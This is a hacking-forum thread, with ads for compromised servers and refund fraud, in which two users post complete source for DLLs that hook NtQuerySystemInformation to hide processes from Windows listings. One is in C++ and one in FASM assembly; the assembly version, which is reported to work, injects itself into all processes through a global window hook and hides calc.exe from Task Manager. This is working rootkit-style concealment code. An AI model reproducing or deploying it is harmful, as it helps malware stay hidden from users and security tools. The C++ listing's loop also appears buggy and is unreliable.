Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
New Ownership - Policies and Changes Going Forward
Thread Rating:
  • 0 Vote(s) - 0 Average


API Hooking Differing across APIs? (NtQuerySystemInformation Hook) filter_list
Author
Message
Rodaxoleaux the Lab Rat Offline
Junior Member
Twelve Years of Service
Posts: 22
Threads: 1
Reputation: 0
Currency: 0 NSP
RE: API Hooking Differing across APIs? (NtQuerySystemInformation Hook) 09-26-2012, 11:08 PM #11
I am on a 32 bit OS so I cannot be writing to a 64 bit process. My current OS is Windows 7 Professional 32-bit. And I am not sure. I just recently started using VC++. I will look more into it. Here is the full DLL source code

Code:
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"

#define STATUS_SUCCESS (NTSTATUS)0x000000000L

typedef struct __SYSTEM_PROCESS_INFORMATION
{
    ULONG NextEntryOffset;
    ULONG NumThreads;
    LARGE_INTEGER Reserved[3];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    ULONG BasePriority;
    HANDLE ProcessId;
    HANDLE InheritedFromProcessId;
} __SYSTEM_PROCESS_INFORMATION,*__PSYSTEM_PROCESS_INFORMATION;

typedef NTSTATUS (WINAPI* NTQSI_Type)(__in      SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                      __inout   PVOID SystemInformation,
                                      __in      ULONG SystemInformationLength,
                                      __out_opt PULONG ReturnLength);

NTQSI_Type oNtQuerySystemInformation;

_declspec(dllexport) NTSTATUS WINAPI hNtQuerySystemInformation(__in      SYSTEM_INFORMATION_CLASS SystemInformationClass,
                                          __inout   PVOID SystemInformation,
                                          __in      ULONG SystemInformationLength,
                                          __out_opt PULONG ReturnLength)
{
    NTSTATUS status = oNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

    if (SystemInformationClass == SystemProcessInformation && status == STATUS_SUCCESS)
    {
        __PSYSTEM_PROCESS_INFORMATION piCur = NULL;
        __PSYSTEM_PROCESS_INFORMATION piNext = (__PSYSTEM_PROCESS_INFORMATION)SystemInformation;

        do
        {
            piCur = piNext;
            piNext = (__PSYSTEM_PROCESS_INFORMATION)SystemInformation;

            if (!wcsncmp(piNext->ImageName.Buffer, L"chrome.exe", piNext->ImageName.Length))
            {
                if (piNext->NextEntryOffset == 0)
                    piCur->NextEntryOffset = 0;
                else
                    piCur->NextEntryOffset += piNext->NextEntryOffset;

                piNext = piCur;
            }
        }
        while(piCur->NextEntryOffset != 0);
    }

    return status;
}

_declspec(dllexport) DWORD WINAPI Hook(LPVOID);
_declspec(dllexport) void Unhook();

BYTE oldBytes[5] = {0};
BYTE JMP[5] = {0};

DWORD oldProtect;

_declspec(dllexport) DWORD WINAPI Hook(LPVOID func)
{
    oNtQuerySystemInformation = (NTQSI_Type)GetProcAddress(GetModuleHandle(L"ntdll.dll"),"NtQuerySystemInformation");
    if (oNtQuerySystemInformation != NULL)
    {    
        MessageBox(NULL,L"Correct",L"",MB_OK);
        BYTE tmpJMP[5] = {0xE9,0x90,0x90,0x90,0x90}; //jmp,A,D,D,R
        memcpy(JMP,tmpJMP,5);
        
        if (VirtualProtect((LPVOID)oNtQuerySystemInformation,5,PAGE_EXECUTE_READWRITE,&oldProtect) == FALSE)
            MessageBox(NULL,L"Error unprotecting memory",L"",MB_OK);

        DWORD Addr = (DWORD)func - (DWORD)oNtQuerySystemInformation - 5;

        for (int i=0;i<4;++i)
            JMP[i+1] = ((BYTE*)&Addr)[i];
        
        memcpy(oldBytes,(LPVOID)oNtQuerySystemInformation,5);

        if (!WriteProcessMemory(GetCurrentProcess(),(LPVOID)oNtQuerySystemInformation,(LPCVOID)JMP,5,NULL))
            MessageBox(NULL,L"Unable to write to process memory space",L"",MB_OK);

        VirtualProtect((LPVOID)oNtQuerySystemInformation,5,oldProtect,NULL);

        FlushInstructionCache(GetCurrentProcess(),NULL,NULL);

        return 0;
    }
    return 1;
}

_declspec(dllexport) void Unhook()
{
    memcpy((LPVOID)oNtQuerySystemInformation,oldBytes,5);
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Hook(&hNtQuerySystemInformation);
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        Unhook();
        break;
    }
    return TRUE;
}

Reply

Jochen Offline
Junior Member
Ten Years of Service
Posts: 10
Threads: 3
Reputation: 0
Currency: 14 NSP
RE: API Hooking Differing across APIs? (NtQuerySystemInformation Hook) 12-28-2017, 05:49 PM #12
This works for me on a 32Bit OS. Tested on Win7.
Example works by hiding calc.exe from taskmgr.exe

Code:
format PE GUI 4.0 DLL
entry DllEntryPoint

include 'win32ax.inc'



struct far_jmp
  PushOp    db  0x68
  PushArg   dd  ?
  RetOp     db  0xc3
ends

FAR_JUMP   far_jmp


proc HideProcess,ProcName:dword, Tasks:dword
    mov     esi, dword [Tasks]
@@:
    stdcall [lstrcmpiW], [esi+SYSTEM_PROCESSES.ProcessName.Buffer], [ProcName]
    cmp     eax, 0h
    jz      @@Found
    mov     ecx, dword [esi]
    cmp     ecx, 0h
    jz      @@End
    mov     edi, esi
    add     esi, ecx
    jmp     @b
@@Found:      
    mov     edx, dword [esi]
    add     dword [edi], edx
@@End:
    ret
endp

proc  NewZQSI,P1:dword , P2:dword , P3:dword , P4:dword
      local   Bytes:DWORD
      stdcall [WriteProcessMemory], INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], addr OldCode, 6, addr Bytes
      stdcall [ZwQuerySystemInformation], [P1], [P2], [P3], [P4]
      pusha
      stdcall [WriteProcessMemory], INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], FAR_JUMP, 6, addr Bytes
      cmp     dword [P1], 05h
      jnz     done
      cmp     eax, 03fffffffh
      ja      done
      stdcall HideProcess, szFileToHide, [P2]
done:
      popa
      ret
endp

proc  HookProc, Code: dword, wParam: dword, lParam: dword
      mov        eax, 0h
      ret
endp

proc  SetHookZQSI
      local      Bytes: DWORD
      stdcall    [ReadProcessMemory], INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], addr OldCode, 6, addr Bytes
      mov        [FAR_JUMP.PushOp], 068h
      mov        [FAR_JUMP.PushArg],NewZQSI
      mov        [FAR_JUMP.RetOp], 0c3h
      stdcall    [WriteProcessMemory],INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], FAR_JUMP, 6, addr Bytes
      ret
endp


proc DllEntryPoint hinstDLL,fdwReason,lpvReserved

     local   hMutex:DWORD
     local   trId:DWORD

     .if [fdwReason] = 1
     .if [hDLL] = 0

      mov        eax, [hinstDLL]
      mov        [hDLL], eax
      mov        eax, dword [hinstDLL]
      mov        dword [hDLL], eax
      stdcall    [SetWindowsHookExA], WH_GETMESSAGE, HookProc, [hDLL], 0
      mov        [hHookMsg], eax
     .endif
     call       SetHookZQSI

.elseif [fdwReason] = 0
      stdcall    [UnhookWindowsHookEx], [hHookMsg]

.endif
      xor        eax, eax
      inc        eax
      ret
      endp

struct IO_COUNTERS
    ReadOperationCount         dq  ?
    WriteOperationCount        dq  ?
    OtherOperationCount        dq  ?
    ReadTransferCount          dq  ?
    WriteTransferCount         dq  ?
    OtherTransferCount         dq  ?
ends

struct VM_COUNTERS
    PeakVirtualSize            dd  ?
    VirtualSize                dd  ?
    PageFaultCount             dd  ?
    PeakWorkingSetSize         dd  ?
    WorkingSetSize             dd  ?
    QuotaPeakPagedPoolUsage    dd  ?
    QuotaPagedPoolUsage        dd  ?
    QuotaPeakNonPagedPoolUsage dd  ?
    QuotaNonPagedPoolUsage     dd  ?
    PagefileUsage              dd  ?
    PeakPagefileUsage          dd  ?
ends

struct UNICODE_STRING
    Len                        dw  ?
    MaximumLen                 dw  ?
    Buffer                     dd  ?
ends

struct TClientID
    UniqueProcess              dd  ?
    UniqueThread               dd  ?
ends

struct SYSTEM_THREADS
    KernelTime                  dq  ?
    UserTime                    dq  ?
    CreateTime                  dq  ?
    WaitTime                    dd  ?
    StartAddress                dd  ?
    ClientId                    TClientID <?>
    Priority                    dd  ?
    BasePriority                dd  ?
    ContextSwitchCount          dd  ?
    State                       dd  ?
    WaitReason                  dd  ?
ends

struct SYSTEM_PROCESSES
    NextEntryDelta              dd  ?
    ThreadCount                 dd  ?
    Reserved1                   dd  6 dup(?)
    CreateTime                  dq  ?
    UserTime                    dq  ?
    KernelTime                  dq  ?
    ProcessName                 UNICODE_STRING <?>
    BasePriority                dd  ?
    ProcessId                   dd  ?
    InheritedFromProcessId      dd  ?
    HandleCount                 dd  ?
    Reserved2                   dd  2 dup (0)
    VmCounters                  VM_COUNTERS <?>
    IoCounters                  IO_COUNTERS <?>
    Threads                     SYSTEM_THREADS <?>
ends

section '.data' data readable writeable

OldCode          db  6 dup(?)

pZQSI            dd ?
hDLL             dd ?
hHookMsg         dd ?


szFileToHide    du 'calc.exe',000


section '.idata' import data readable writeable
library kernel32,'kernel32.dll',user32,'user32.dll',ntdll,'ntdll.dll'

    import ntdll,\
         ZwQuerySystemInformation,'NtQuerySystemInformation'

    include "%include%/api/kernel32.inc"
    include "%include%/api/user32.inc"

section '.reloc' fixups data readable discardable

Reply







Users browsing this thread: 1 Guest(s)